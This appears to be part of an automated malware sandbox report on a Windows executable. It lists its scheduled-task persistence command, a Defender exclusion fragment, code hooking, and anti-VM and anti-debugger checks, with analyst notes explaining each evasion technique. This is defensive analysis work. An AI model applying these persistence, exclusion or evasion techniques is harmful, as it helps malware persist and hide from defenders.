          Source: Ms5nQdSz5l.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Ms5nQdSz5l.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Ms5nQdSz5l.exe, 00000009.00000003.243388587.0000000000F30000.00000004.00000001.sdmp, mstsc.exe, 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Ms5nQdSz5l.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
          Source: Ms5nQdSz5l.exe Static PE information: 0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0041D9B9 push ss; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0040E29B pushfd ; retf
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_00404443 push cs; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0041E586 push esp; ret
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: 9_2_0114D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_04FDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AED085 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AED0DB push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AED0D2 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AED9B9 push ss; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AED13C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00ADE29B pushfd ; retf
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AD4443 push cs; ret
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 23_2_00AEE586 push esp; ret
          Source: initial sample Static PE information: section name: .text entropy: 7.5188778941
          Source: initial sample Static PE information: section name: .text entropy: 7.5188778941
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe File created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ms5nQdSz5l.exe PID: 3560, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME (wine_get_unix_file_name is a kernel32 export that exists only under Wine; probing for it is a Wine check)
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL (the DLL Sandboxie injects into every sandboxed process; its presence in the module list is a Sandboxie check)
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 0000000000AD98E4 second address: 0000000000AD98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 0000000000AD9B5E second address: 0000000000AD9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
The probe is two back-to-back RDTSC reads six bytes apart: the low 32 bits of the first reading (EAX) are parked in ECX so the gap to the second reading can be compared against a threshold, and that gap is inflated by a hypervisor that traps RDTSC or a debugger single-stepping the code. The two probes sit at the same page offsets in Ms5nQdSz5l.exe (0x4098E4, 0x409B5E) and in mstsc.exe (0xAD98E4, 0xAD9B5E), i.e. it is the same code running in the process the payload was injected into.
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4675
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3066
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4061
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2755
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4083
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2291
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe TID: 396 | Thread sleep time: -99418s >= -30000s
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe TID: 1688 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 612 | Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412 | Thread sleep count: 4061 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580 | Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6400 | Thread sleep count: 2755 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536 | Thread sleep count: 4083 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696 | Thread sleep count: 63 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 | Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540 | Thread sleep count: 2291 > 30
Source: C:\Windows\explorer.exe TID: 5804 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Thread delayed: delay time: 99418
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
The strings below that come from explorer.exe and powershell.exe are those processes' own memory (Windows resource text about Hyper-V and the shell's device-path enumeration) and only show that the analysis host is a VMware guest. The evidence that the sample itself looks for a VM is the list in the Ms5nQdSz5l.exe dump at 030F4000: the VMware Tools install path and registry key, the Scsi DEVICEMAP and Disk\Enum keys, the display-adapter class key {4D36E968-E325-11CE-BFC1-08002BE10318}\0000 and the "VMware SVGA II" adapter name.
Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local (the same device-path string recurs four more times in this dump with different trailing bytes; the repeats are omitted here)
Source: powershell.exe, 00000001.00000003.363071692.00000000053AB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
Source: explorer.exe, 0000000B.00000000.329550509.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: explorer.exe, 0000000B.00000002.497448506.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000B.00000000.329940814.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000B.00000000.262710030.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000002.510154790.0000000003755000.00000004.00000001.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000B.00000002.510154790.0000000003755000.00000004.00000001.sdmp | Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath " (the VM check list sits directly beside the Defender exclusion command the sample later runs through PowerShell)
Source: explorer.exe, 0000000B.00000000.329940814.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000B.00000000.292794369.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000001.00000003.363071692.00000000053AB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe | Process queried: DebugPort
The DebugPort query is NtQueryInformationProcess(ProcessDebugPort); a non-zero port means a debugger is attached. It is issued both by the original process and by the injected mstsc.exe, so the check lives in the payload rather than only in the loader.
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0040ACD0 LdrLoadDll,
In a 32-bit process fs:[30h] is the TEB field that points to the PEB. The sites below read it directly instead of going through an API, which is how checks such as PEB.BeingDebugged and PEB.NtGlobalFlag, and manual walks of the PEB loader lists, are done without leaving an API-call trace. All hits are in the 9_2 dump of Ms5nQdSz5l.exe, in the 010Fxxxx to 011Cxxxx region, well away from the image's own code at 0040xxxx.
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0112513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0112513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01114120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0111B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0111B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01122990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0111C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0112A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011C4015 mov eax, dword ptr fs:[00000030h]
